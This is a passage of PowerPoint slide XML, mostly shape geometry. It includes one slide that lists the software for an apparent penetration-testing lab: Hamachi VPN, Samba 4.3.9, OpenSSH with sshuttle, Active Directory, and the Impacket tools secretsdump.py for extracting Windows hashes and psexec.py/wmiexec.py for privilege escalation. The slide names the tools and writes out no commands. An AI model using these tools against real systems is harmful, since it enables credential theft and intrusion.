          <p:spPr>
            <a:xfrm>
              <a:off x="6302425" y="2121150"/>
              <a:ext cx="138525" cy="176750"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="7070" w="5541">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6472775" y="2121150"/>
              <a:ext cx="121025" cy="176750"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="7070" w="4841">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1688525" y="661175"/>
              <a:ext cx="92350" cy="178350"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="7134" w="369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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1461393" y="1206602"/>
              <a:ext cx="147728" cy="176750"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="7070" w="5478">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1291396" y="1206602"/>
              <a:ext cx="151153" cy="176750"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="7070" w="5605">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1037205" y="1206602"/>
              <a:ext cx="252497" cy="176750"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="7070" w="9363">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="908417" y="1206602"/>
              <a:ext cx="109946" cy="176750"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="7070" w="4077">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="7069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4076" y="7069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4076" y="5668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1529" y="5668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2245750" y="4830900"/>
              <a:ext cx="162425" cy="211775"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2433625" y="4727400"/>
              <a:ext cx="207000" cy="380550"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="15222" w="8280">
                  <a:moveTo>
                    <a:pt x="6114" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="15221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2165" y="15221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2661300" y="4830900"/>
              <a:ext cx="164000" cy="211775"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="8471" w="656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6"/>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Software</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;324;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410350" y="1421638"/>
            <a:ext cx="8520600" cy="2570400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hamachi VPN Service (Kali and Ubuntu)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Samba 4.3.9 (Ubuntu)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>OpenSSH-Server (Ubuntu) and Sshuttle (Kali)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Active Directory Installation for Windows Server</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Impacket (Kali)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>secretsdump.py </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>for extracting hashes on Windows</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>psexec.py and wmiexec.py </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> escalation scripts </a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto 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